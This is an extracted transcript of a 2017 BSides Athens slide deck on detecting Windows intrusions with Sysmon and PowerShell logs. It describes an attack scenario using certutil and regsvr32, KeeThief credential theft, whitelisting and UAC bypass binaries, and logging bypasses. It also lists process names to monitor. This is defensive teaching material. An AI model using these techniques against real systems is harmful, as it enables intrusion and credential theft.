Detect the undetectable with Sysinternals Sysmon and ... · PDF fileDimitris Margaritis Bsides...
Transcript of Detect the undetectable with Sysinternals Sysmon and ... · PDF fileDimitris Margaritis Bsides...
![Page 1: Detect the undetectable with Sysinternals Sysmon and ... · PDF fileDimitris Margaritis Bsides Athens 2017 24/6/2017 Detect the undetectable with Sysinternals Sysmon and Powershell](https://reader034.fdocuments.in/reader034/viewer/2022042501/5a9e49057f8b9a36788dadef/html5/thumbnails/1.jpg)
Dimitris MargaritisBsides Athens 2017
24/6/2017
Detect the undetectable with Sysinternals Sysmon and Powershell logs
![Page 2: Detect the undetectable with Sysinternals Sysmon and ... · PDF fileDimitris Margaritis Bsides Athens 2017 24/6/2017 Detect the undetectable with Sysinternals Sysmon and Powershell](https://reader034.fdocuments.in/reader034/viewer/2022042501/5a9e49057f8b9a36788dadef/html5/thumbnails/2.jpg)
-This presentation is made on a personal basis and does not necessarily reflect the position of my employer
![Page 3: Detect the undetectable with Sysinternals Sysmon and ... · PDF fileDimitris Margaritis Bsides Athens 2017 24/6/2017 Detect the undetectable with Sysinternals Sysmon and Powershell](https://reader034.fdocuments.in/reader034/viewer/2022042501/5a9e49057f8b9a36788dadef/html5/thumbnails/3.jpg)
10 years with defenders in Greece 10 years with Red devils in Belgium
Blue is on my genes BUT red way of thinking is exciting
![Page 4: Detect the undetectable with Sysinternals Sysmon and ... · PDF fileDimitris Margaritis Bsides Athens 2017 24/6/2017 Detect the undetectable with Sysinternals Sysmon and Powershell](https://reader034.fdocuments.in/reader034/viewer/2022042501/5a9e49057f8b9a36788dadef/html5/thumbnails/4.jpg)
Windows logs can be fragile
April 2016
I can detect this in PowerShellS logs
![Page 5: Detect the undetectable with Sysinternals Sysmon and ... · PDF fileDimitris Margaritis Bsides Athens 2017 24/6/2017 Detect the undetectable with Sysinternals Sysmon and Powershell](https://reader034.fdocuments.in/reader034/viewer/2022042501/5a9e49057f8b9a36788dadef/html5/thumbnails/5.jpg)
Maslow’s Pyramid of Defensive Controls
"Defending Against PowerShell Attacks“ Lee Holmes Dutch PowerShell User Group 08-04-2017
Sysmon
Patching Download controls Awareness Antivirus
Application Whitelisting in Deny Mode
Application Whitelisting in Allow Mode
Auditing
Host-based artifacts
Memory-basedartifacts
Get-InjetedThread
https://gist.github.com/jaredcatkinson
-Classic Injection-Reflective DLL Injection-Memory module
![Page 6: Detect the undetectable with Sysinternals Sysmon and ... · PDF fileDimitris Margaritis Bsides Athens 2017 24/6/2017 Detect the undetectable with Sysinternals Sysmon and Powershell](https://reader034.fdocuments.in/reader034/viewer/2022042501/5a9e49057f8b9a36788dadef/html5/thumbnails/6.jpg)
Why Sysmon?
-Features not available in standard windows logging
- Centralization using Windows Event Forwarding
- It’s “FREE”
- Explosion of Sysmon resources during the last 6 months
![Page 7: Detect the undetectable with Sysinternals Sysmon and ... · PDF fileDimitris Margaritis Bsides Athens 2017 24/6/2017 Detect the undetectable with Sysinternals Sysmon and Powershell](https://reader034.fdocuments.in/reader034/viewer/2022042501/5a9e49057f8b9a36788dadef/html5/thumbnails/7.jpg)
Sysmon Installation-Configuration
-Sysmon service can be hidden…
-Can Sysmon be hidden for non-admin users?
…but process is running, Sysmon log file is there
![Page 8: Detect the undetectable with Sysinternals Sysmon and ... · PDF fileDimitris Margaritis Bsides Athens 2017 24/6/2017 Detect the undetectable with Sysinternals Sysmon and Powershell](https://reader034.fdocuments.in/reader034/viewer/2022042501/5a9e49057f8b9a36788dadef/html5/thumbnails/8.jpg)
Sysmon Events
v6
![Page 9: Detect the undetectable with Sysinternals Sysmon and ... · PDF fileDimitris Margaritis Bsides Athens 2017 24/6/2017 Detect the undetectable with Sysinternals Sysmon and Powershell](https://reader034.fdocuments.in/reader034/viewer/2022042501/5a9e49057f8b9a36788dadef/html5/thumbnails/9.jpg)
Detection with Sysmon : RSA 2016
-Many other sources with detections based on parent-child relationshipse.g excel,word spawns cmd,powershell etc
![Page 10: Detect the undetectable with Sysinternals Sysmon and ... · PDF fileDimitris Margaritis Bsides Athens 2017 24/6/2017 Detect the undetectable with Sysinternals Sysmon and Powershell](https://reader034.fdocuments.in/reader034/viewer/2022042501/5a9e49057f8b9a36788dadef/html5/thumbnails/10.jpg)
Who is my parent?
Now possible for script kiddies like me
Who is doing the network connection?
In the case of Word + COM Object winword.exe
After getting foothold spawn everything as Internet Explorer process
![Page 11: Detect the undetectable with Sysinternals Sysmon and ... · PDF fileDimitris Margaritis Bsides Athens 2017 24/6/2017 Detect the undetectable with Sysinternals Sysmon and Powershell](https://reader034.fdocuments.in/reader034/viewer/2022042501/5a9e49057f8b9a36788dadef/html5/thumbnails/11.jpg)
Detection with Sysmon : RSA 2017
![Page 12: Detect the undetectable with Sysinternals Sysmon and ... · PDF fileDimitris Margaritis Bsides Athens 2017 24/6/2017 Detect the undetectable with Sysinternals Sysmon and Powershell](https://reader034.fdocuments.in/reader034/viewer/2022042501/5a9e49057f8b9a36788dadef/html5/thumbnails/12.jpg)
Detection with Sysmon : FIRST Conf 2017
http://security-research.dyndns.org/pub/slides/FIRST2017/FIRST-2017_Tom-Ueltschi_Sysmon_FINAL.pdf
![Page 13: Detect the undetectable with Sysinternals Sysmon and ... · PDF fileDimitris Margaritis Bsides Athens 2017 24/6/2017 Detect the undetectable with Sysinternals Sysmon and Powershell](https://reader034.fdocuments.in/reader034/viewer/2022042501/5a9e49057f8b9a36788dadef/html5/thumbnails/13.jpg)
Sysmon CreateRemoteThread
-Detection :
Look for CreateRemoteThread Event with TargetImage keepass.exe
Below the sysmon EID 8 after running Keethief
CreateRemoteThread detected:
UtcTime: 2016-08-04 14:08:20.536
SourceImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
TargetImage: C:\Program Files (x86)\KeePass Password Safe 2\KeePass.exe
StartModule: C:\Windows\SYSTEM32\ntdll.dll
-Use Keethief against Keepass
![Page 14: Detect the undetectable with Sysinternals Sysmon and ... · PDF fileDimitris Margaritis Bsides Athens 2017 24/6/2017 Detect the undetectable with Sysinternals Sysmon and Powershell](https://reader034.fdocuments.in/reader034/viewer/2022042501/5a9e49057f8b9a36788dadef/html5/thumbnails/14.jpg)
CreateRemoteThread to IE to blend in with normal traffic
Powershell “operation” using IE
BUT
Monitor Msbuild.exe and InstallUtil.exe
![Page 15: Detect the undetectable with Sysinternals Sysmon and ... · PDF fileDimitris Margaritis Bsides Athens 2017 24/6/2017 Detect the undetectable with Sysinternals Sysmon and Powershell](https://reader034.fdocuments.in/reader034/viewer/2022042501/5a9e49057f8b9a36788dadef/html5/thumbnails/15.jpg)
Sysmon Persistence Detections
HKLM\Software\Microsoft\Windows\CurrentVersion\Run[Once]\HKCU\Software\Microsoft\Windows\CurrentVersion\Run[Once]\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_DLLs
Define DLLs that are injected to every application that uses user32.dll Disabled in windows 8+
sdbinst.exe Abuse shim databases
Schedule Tasks
Start up Folder
![Page 16: Detect the undetectable with Sysinternals Sysmon and ... · PDF fileDimitris Margaritis Bsides Athens 2017 24/6/2017 Detect the undetectable with Sysinternals Sysmon and Powershell](https://reader034.fdocuments.in/reader034/viewer/2022042501/5a9e49057f8b9a36788dadef/html5/thumbnails/16.jpg)
Detect .hta, .js, .vbs etc in user profile if you don’t block them
Sysmon monitoring for droppers
Hashes of attachments
![Page 17: Detect the undetectable with Sysinternals Sysmon and ... · PDF fileDimitris Margaritis Bsides Athens 2017 24/6/2017 Detect the undetectable with Sysinternals Sysmon and Powershell](https://reader034.fdocuments.in/reader034/viewer/2022042501/5a9e49057f8b9a36788dadef/html5/thumbnails/17.jpg)
The pyramid of hell
http://bit.ly/2qPMUeD
Advancedtechniquesabove this line
-Command length-Regular expression
-Count special characters-Frequency of characters
EID 400Check EngineVersion
-Sysmon EID 7 ONLY in Windows 10
![Page 18: Detect the undetectable with Sysinternals Sysmon and ... · PDF fileDimitris Margaritis Bsides Athens 2017 24/6/2017 Detect the undetectable with Sysinternals Sysmon and Powershell](https://reader034.fdocuments.in/reader034/viewer/2022042501/5a9e49057f8b9a36788dadef/html5/thumbnails/18.jpg)
Powershell logs
-Applications and Services LogWindows-Powershell : EID 400
-Applications and Services LogMicrosoftWindowsPowershellOperational : EID 4104 : Script block logsEID 4103 : Module Logs
-Transcription log : txt file
What to look for in PowerShell logs
![Page 19: Detect the undetectable with Sysinternals Sysmon and ... · PDF fileDimitris Margaritis Bsides Athens 2017 24/6/2017 Detect the undetectable with Sysinternals Sysmon and Powershell](https://reader034.fdocuments.in/reader034/viewer/2022042501/5a9e49057f8b9a36788dadef/html5/thumbnails/19.jpg)
Recent Attack Scenario
![Page 20: Detect the undetectable with Sysinternals Sysmon and ... · PDF fileDimitris Margaritis Bsides Athens 2017 24/6/2017 Detect the undetectable with Sysinternals Sysmon and Powershell](https://reader034.fdocuments.in/reader034/viewer/2022042501/5a9e49057f8b9a36788dadef/html5/thumbnails/20.jpg)
Scenario
-Create and categorize a new domain
-Using domain fronting in Empire or Cobalt Strike
-Create https OR DNS beacon dllbase64 phish a userdeliver as txt
-txt dropped -->Call certutil txtdllCall regsvr32 to run the dll
-Fully patched windows 10 with application whitelisting inallow mode for executables compromised.
![Page 21: Detect the undetectable with Sysinternals Sysmon and ... · PDF fileDimitris Margaritis Bsides Athens 2017 24/6/2017 Detect the undetectable with Sysinternals Sysmon and Powershell](https://reader034.fdocuments.in/reader034/viewer/2022042501/5a9e49057f8b9a36788dadef/html5/thumbnails/21.jpg)
Blue Team I WITHOUT endpoint logs monitoring
FirewallAdmin AV Admin
IDS Admin
MANAGER
Up to date AV, Intrusion Detection System no ALERT…
Expensive Threat Intel info for IOCs didn’t help…
![Page 22: Detect the undetectable with Sysinternals Sysmon and ... · PDF fileDimitris Margaritis Bsides Athens 2017 24/6/2017 Detect the undetectable with Sysinternals Sysmon and Powershell](https://reader034.fdocuments.in/reader034/viewer/2022042501/5a9e49057f8b9a36788dadef/html5/thumbnails/22.jpg)
Blue Team II WITH endpoint logs monitoring
Use Sysmon EID1 to analyse usage of certutil.exe
-also believes in sharing of information and update its detection playbook frequently
![Page 23: Detect the undetectable with Sysinternals Sysmon and ... · PDF fileDimitris Margaritis Bsides Athens 2017 24/6/2017 Detect the undetectable with Sysinternals Sysmon and Powershell](https://reader034.fdocuments.in/reader034/viewer/2022042501/5a9e49057f8b9a36788dadef/html5/thumbnails/23.jpg)
LogName=Microsoft-Windows-Sysmon/Operational EventCode=3 Image: C:\Windows\System32\regsvr32.exe
Regsvr32.exe
Good to monitor network connections to internet from :powershell,msbuild,bitsadmin,svchost,mshta,rundll32
![Page 24: Detect the undetectable with Sysinternals Sysmon and ... · PDF fileDimitris Margaritis Bsides Athens 2017 24/6/2017 Detect the undetectable with Sysinternals Sysmon and Powershell](https://reader034.fdocuments.in/reader034/viewer/2022042501/5a9e49057f8b9a36788dadef/html5/thumbnails/24.jpg)
Attacker abuses Windows Commands after getting foothold
Within 5 mins I don’t expect an admin to execute all these commands
![Page 25: Detect the undetectable with Sysinternals Sysmon and ... · PDF fileDimitris Margaritis Bsides Athens 2017 24/6/2017 Detect the undetectable with Sysinternals Sysmon and Powershell](https://reader034.fdocuments.in/reader034/viewer/2022042501/5a9e49057f8b9a36788dadef/html5/thumbnails/25.jpg)
Abuse of legitimate windows commands
*Cleaning of “noise” requiredMy noise is not same as yours!
RegsvcsRegasmInstallUtilBginfoMsbuildSdctleventvwrfodhelper
UAC bypass credits @enigma0x3
Application Whitelisting bypassCredits @subTee
Tasklistnltest /dclistShtasksWhoamiBitsadmincertutilscNet*Wmic*…..
C:\$Recycle.bin\
![Page 26: Detect the undetectable with Sysinternals Sysmon and ... · PDF fileDimitris Margaritis Bsides Athens 2017 24/6/2017 Detect the undetectable with Sysinternals Sysmon and Powershell](https://reader034.fdocuments.in/reader034/viewer/2022042501/5a9e49057f8b9a36788dadef/html5/thumbnails/26.jpg)
Command line logs are not enough…
Attacker can achieve Reconnaissance using Invoke-HostRecon to hide commands from command line logs
![Page 27: Detect the undetectable with Sysinternals Sysmon and ... · PDF fileDimitris Margaritis Bsides Athens 2017 24/6/2017 Detect the undetectable with Sysinternals Sysmon and Powershell](https://reader034.fdocuments.in/reader034/viewer/2022042501/5a9e49057f8b9a36788dadef/html5/thumbnails/27.jpg)
Attacker uses Powershell to download
Sysmon EID 1 :It might be detected based on number of special characters butit can be found into PowerShell logs by looking for things known as bad
ATTENTION : If Invoke-Expression is not used, obfuscation remains in powershell logs
![Page 28: Detect the undetectable with Sysinternals Sysmon and ... · PDF fileDimitris Margaritis Bsides Athens 2017 24/6/2017 Detect the undetectable with Sysinternals Sysmon and Powershell](https://reader034.fdocuments.in/reader034/viewer/2022042501/5a9e49057f8b9a36788dadef/html5/thumbnails/28.jpg)
Powershell Scriptblock log
1 Month agoPosts for bypassing Script block logging.
Module log still there. Although noisy volume can be manageable
![Page 29: Detect the undetectable with Sysinternals Sysmon and ... · PDF fileDimitris Margaritis Bsides Athens 2017 24/6/2017 Detect the undetectable with Sysinternals Sysmon and Powershell](https://reader034.fdocuments.in/reader034/viewer/2022042501/5a9e49057f8b9a36788dadef/html5/thumbnails/29.jpg)
Things are moving really fast !!!!!! (6 days ago)
Another bypass?
![Page 30: Detect the undetectable with Sysinternals Sysmon and ... · PDF fileDimitris Margaritis Bsides Athens 2017 24/6/2017 Detect the undetectable with Sysinternals Sysmon and Powershell](https://reader034.fdocuments.in/reader034/viewer/2022042501/5a9e49057f8b9a36788dadef/html5/thumbnails/30.jpg)
Defaults….Normal user has access to powershelloperational log
-We enable PS log for good but it can be very bad!
-Protected Event Logging is nice but challenging to implement
-Minimum control : Don’t allow non-admin users to access PowerShell logs
https://blogs.technet.microsoft.com/kfalde/2017/05/13/securing-your-powershell-operational-logs/
![Page 31: Detect the undetectable with Sysinternals Sysmon and ... · PDF fileDimitris Margaritis Bsides Athens 2017 24/6/2017 Detect the undetectable with Sysinternals Sysmon and Powershell](https://reader034.fdocuments.in/reader034/viewer/2022042501/5a9e49057f8b9a36788dadef/html5/thumbnails/31.jpg)
Recent techniques
For blue : Your goalis not to detect the Red butthe adversaries ….
Red Tipsuseful for blue
https://threatintel.eu/2017/06/03/red-teaming-tips-by-vincent-yiu/
-Block by applicationwhitelisting of execution in temp folder-Easy detection with Sysmon EID 11 OR 15
![Page 32: Detect the undetectable with Sysinternals Sysmon and ... · PDF fileDimitris Margaritis Bsides Athens 2017 24/6/2017 Detect the undetectable with Sysinternals Sysmon and Powershell](https://reader034.fdocuments.in/reader034/viewer/2022042501/5a9e49057f8b9a36788dadef/html5/thumbnails/32.jpg)
ATT&CK - Sigma
![Page 33: Detect the undetectable with Sysinternals Sysmon and ... · PDF fileDimitris Margaritis Bsides Athens 2017 24/6/2017 Detect the undetectable with Sysinternals Sysmon and Powershell](https://reader034.fdocuments.in/reader034/viewer/2022042501/5a9e49057f8b9a36788dadef/html5/thumbnails/33.jpg)
ATT&CK Model : Sysmon Detections
ATT&CK is a very good start for Gap Analysis however not enough for the latest attacks
![Page 34: Detect the undetectable with Sysinternals Sysmon and ... · PDF fileDimitris Margaritis Bsides Athens 2017 24/6/2017 Detect the undetectable with Sysinternals Sysmon and Powershell](https://reader034.fdocuments.in/reader034/viewer/2022042501/5a9e49057f8b9a36788dadef/html5/thumbnails/34.jpg)
What is Sigma?
Florian’s Roth and Thomas PatzkeOpen Source Project
Sigma is for log files what Snort is for network traffic and YARA is for files.
![Page 35: Detect the undetectable with Sysinternals Sysmon and ... · PDF fileDimitris Margaritis Bsides Athens 2017 24/6/2017 Detect the undetectable with Sysinternals Sysmon and Powershell](https://reader034.fdocuments.in/reader034/viewer/2022042501/5a9e49057f8b9a36788dadef/html5/thumbnails/35.jpg)
Sigma Rule example
![Page 36: Detect the undetectable with Sysinternals Sysmon and ... · PDF fileDimitris Margaritis Bsides Athens 2017 24/6/2017 Detect the undetectable with Sysinternals Sysmon and Powershell](https://reader034.fdocuments.in/reader034/viewer/2022042501/5a9e49057f8b9a36788dadef/html5/thumbnails/36.jpg)
Sigma Sysmon rules
![Page 37: Detect the undetectable with Sysinternals Sysmon and ... · PDF fileDimitris Margaritis Bsides Athens 2017 24/6/2017 Detect the undetectable with Sysinternals Sysmon and Powershell](https://reader034.fdocuments.in/reader034/viewer/2022042501/5a9e49057f8b9a36788dadef/html5/thumbnails/37.jpg)
Sigma rules sharing through MISP
![Page 38: Detect the undetectable with Sysinternals Sysmon and ... · PDF fileDimitris Margaritis Bsides Athens 2017 24/6/2017 Detect the undetectable with Sysinternals Sysmon and Powershell](https://reader034.fdocuments.in/reader034/viewer/2022042501/5a9e49057f8b9a36788dadef/html5/thumbnails/38.jpg)
Takeaways
-Log Management System must be installed in a security zone with special controls
![Page 39: Detect the undetectable with Sysinternals Sysmon and ... · PDF fileDimitris Margaritis Bsides Athens 2017 24/6/2017 Detect the undetectable with Sysinternals Sysmon and Powershell](https://reader034.fdocuments.in/reader034/viewer/2022042501/5a9e49057f8b9a36788dadef/html5/thumbnails/39.jpg)
“To know your Systemsand your Logs is the beginningof security”
-Visibility on endpoints is important
-Climb up the blue pyramid step by step
-Analysing PowerShell logs is a MUST
-Credentials theft is not only mimikatz… a password in browser ‘s store maybe is enough
-Critical success factor for Sysmon deployment and not only: Security team must cooperate perfectly with system administrators
Takeaways
![Page 40: Detect the undetectable with Sysinternals Sysmon and ... · PDF fileDimitris Margaritis Bsides Athens 2017 24/6/2017 Detect the undetectable with Sysinternals Sysmon and Powershell](https://reader034.fdocuments.in/reader034/viewer/2022042501/5a9e49057f8b9a36788dadef/html5/thumbnails/40.jpg)
![Page 42: Detect the undetectable with Sysinternals Sysmon and ... · PDF fileDimitris Margaritis Bsides Athens 2017 24/6/2017 Detect the undetectable with Sysinternals Sysmon and Powershell](https://reader034.fdocuments.in/reader034/viewer/2022042501/5a9e49057f8b9a36788dadef/html5/thumbnails/42.jpg)
Appendix 1Cobalt Kitty/APT 32
![Page 43: Detect the undetectable with Sysinternals Sysmon and ... · PDF fileDimitris Margaritis Bsides Athens 2017 24/6/2017 Detect the undetectable with Sysinternals Sysmon and Powershell](https://reader034.fdocuments.in/reader034/viewer/2022042501/5a9e49057f8b9a36788dadef/html5/thumbnails/43.jpg)
Operation Cobalt Kitty/APT32
Current Trend : Attackers using commercial or open source offensive tools
![Page 44: Detect the undetectable with Sysinternals Sysmon and ... · PDF fileDimitris Margaritis Bsides Athens 2017 24/6/2017 Detect the undetectable with Sysinternals Sysmon and Powershell](https://reader034.fdocuments.in/reader034/viewer/2022042501/5a9e49057f8b9a36788dadef/html5/thumbnails/44.jpg)
Penetration phase
-Block Word Macros from Internet e.g Office feature, EMET, Email Gateway sanitization
Word File with malicious macro delivering Cobalt Strike Beacon
Schtasks /createMshta.exe regsvr32
Privilege Escalation phase
![Page 45: Detect the undetectable with Sysinternals Sysmon and ... · PDF fileDimitris Margaritis Bsides Athens 2017 24/6/2017 Detect the undetectable with Sysinternals Sysmon and Powershell](https://reader034.fdocuments.in/reader034/viewer/2022042501/5a9e49057f8b9a36788dadef/html5/thumbnails/45.jpg)
Persistence phase
• Trivial techniques
• Registry Autorun
• Schedule Tasks
• Outlook Persistence
• More advanced
• DLL hijacking Against Wsearch service
Classic parent-child process detection (office cmd)
Classic Registry key monitoring with Sysmon
![Page 46: Detect the undetectable with Sysinternals Sysmon and ... · PDF fileDimitris Margaritis Bsides Athens 2017 24/6/2017 Detect the undetectable with Sysinternals Sysmon and Powershell](https://reader034.fdocuments.in/reader034/viewer/2022042501/5a9e49057f8b9a36788dadef/html5/thumbnails/46.jpg)
C2 communication
1) Regsvr32 download
2) Powershell downloads
3) Outlook macro (outlook.execmd.exe)
4) CobaltStrike Malleable C2 profiles
5) DNS Tunneling
Detections with DNS logs
Detections with Sysmon and Powershell logs
![Page 47: Detect the undetectable with Sysinternals Sysmon and ... · PDF fileDimitris Margaritis Bsides Athens 2017 24/6/2017 Detect the undetectable with Sysinternals Sysmon and Powershell](https://reader034.fdocuments.in/reader034/viewer/2022042501/5a9e49057f8b9a36788dadef/html5/thumbnails/47.jpg)
Defenders blocked powershell.exe
Offensive Powershell Tools leave signs in PowerShell logs
![Page 48: Detect the undetectable with Sysinternals Sysmon and ... · PDF fileDimitris Margaritis Bsides Athens 2017 24/6/2017 Detect the undetectable with Sysinternals Sysmon and Powershell](https://reader034.fdocuments.in/reader034/viewer/2022042501/5a9e49057f8b9a36788dadef/html5/thumbnails/48.jpg)
Execution phase
![Page 49: Detect the undetectable with Sysinternals Sysmon and ... · PDF fileDimitris Margaritis Bsides Athens 2017 24/6/2017 Detect the undetectable with Sysinternals Sysmon and Powershell](https://reader034.fdocuments.in/reader034/viewer/2022042501/5a9e49057f8b9a36788dadef/html5/thumbnails/49.jpg)
Appendix 2Centralizing Logs using WEF
![Page 50: Detect the undetectable with Sysinternals Sysmon and ... · PDF fileDimitris Margaritis Bsides Athens 2017 24/6/2017 Detect the undetectable with Sysinternals Sysmon and Powershell](https://reader034.fdocuments.in/reader034/viewer/2022042501/5a9e49057f8b9a36788dadef/html5/thumbnails/50.jpg)
Prepare your environment for hunting - investigations
• Install WEC(s) server(s)
• Enable Centralize Logs:
-Powershell logs confighttps://www.fireeye.com/blog/threat-research/2016/02/greater_visibilityt.html
-Sysmon confighttps://medium.com/@lennartkoopmann/explaining-and-adapting-tays-sysmon-configuration-27d9719a89a8
WEF - Works even with sources outside a domain-https://mva.microsoft.com/en-US/training-courses/event-forwarding-and-log-analysis-16506?l=fZ2kRFGmC_1304300474
-https://docs.microsoft.com/en-us/windows/threat-protection/use-windows-event-forwarding-to-assist-in-instrusion-detection
-https://msdn.microsoft.com/en-us/library/windows/desktop/bb870973(v=vs.85).aspx
![Page 51: Detect the undetectable with Sysinternals Sysmon and ... · PDF fileDimitris Margaritis Bsides Athens 2017 24/6/2017 Detect the undetectable with Sysinternals Sysmon and Powershell](https://reader034.fdocuments.in/reader034/viewer/2022042501/5a9e49057f8b9a36788dadef/html5/thumbnails/51.jpg)
References
Sysmon
1. https://published-prd.lanyonevents.com/published/rsaus17/sessionsFiles/5011/HTA-T09-How-to-go-from-responding-to-hunting-with-Sysinternals-Sysmon.pdf
2. http://security-research.dyndns.org/pub/slides/FIRST2017/FIRST-2017_Tom-Ueltschi_Sysmon_FINAL.pdf
3. http://securitylogs.org
4. https://github.com/Neo23x0/sigma/tree/master/rules/windows/sysmon
5. https://github.com/MHaggis/sysmon-dfir
6. https://cyberwardog.blogspot.be
7. http://www.crypsisgroup.com/images/site/CG_WhitePaper_Splunkmon_1216.pdf
Hunting in memoryhttps://www.endgame.com/blog/technical-blog/hunting-memory
Who to follow on Twitter http://twitter.com/asfakian/lists/threat-intelligence
![Page 52: Detect the undetectable with Sysinternals Sysmon and ... · PDF fileDimitris Margaritis Bsides Athens 2017 24/6/2017 Detect the undetectable with Sysinternals Sysmon and Powershell](https://reader034.fdocuments.in/reader034/viewer/2022042501/5a9e49057f8b9a36788dadef/html5/thumbnails/52.jpg)
References• PowerShell
http://www.leeholmes.com/blog/2016/10/22/more-detecting-obfuscated-powershell/
https://www.asd.gov.au/publications/protect/Securing_PowerShell.pdf
https://adsecurity.org/wp-content/uploads/2017/05/2017-RyersonUniversity-Metcalf-CurrentStateofSecurity-Final.pdf
https://gist.github.com/MatthewDemaske/d23280ef84b0a67e0848577600940ba9
https://www.fireeye.com/blog/threat-research/2016/02/greater_visibilityt.html
https://blogs.msdn.microsoft.com/daviddasneves/2017/05/25/powershell-security-at-enterprise-customers/
https://blogs.technet.microsoft.com/kfalde/2017/05/13/securing-your-powershell-operational-logs/
https://cobbr.io/ScriptBlock-Warning-Event-Logging-Bypass.html
https://blogs.technet.microsoft.com/kfalde/2017/05/13/securing-your-powershell-operational-logs/
• Cobalt Kittyhttps://www.cybereason.com/labs-operation-cobalt-kitty-a-large-scale-apt-in-asia-carried-out-by-the-oceanlotus-group/
• Other• https://www.derekseaman.com/2013/06/teched-pass-the-hash-preventing-lateral-movement-atc-b210.html
http://subt0x10.blogspot.be/2017/04/shellcode-injection-via-queueuserapc.html
https://gist.github.com/jaredcatkinson/23905d34537ce4b5b1818c3e6405c1d2
https://www.sans.org/summit-archives/file/summit-archive-1492714038.pdf
https://drive.google.com/file/d/0Bzb5kQFOXkiSVEVMTy12dlhJcW8/view
http://www.labofapenetrationtester.com/2016/05/practical-use-of-javascript-and-com-for-pentesting.html
https://drive.google.com/file/d/0Bzb5kQFOXkiSVEVMTy12dlhJcW8/view
http://malwarejake.blogspot.be/2017/01/implications-of-newest-shadow-brokers.html
https://artofpwn.com/phant0m-killing-windows-event-log.html
http://www.harmj0y.net/blog/redteaming/keethief-a-case-study-in-attacking-keepass-part-2/
https://github.com/Cn33liz/StarFighters
https://github.com/acalarch/ETL-to-EVTX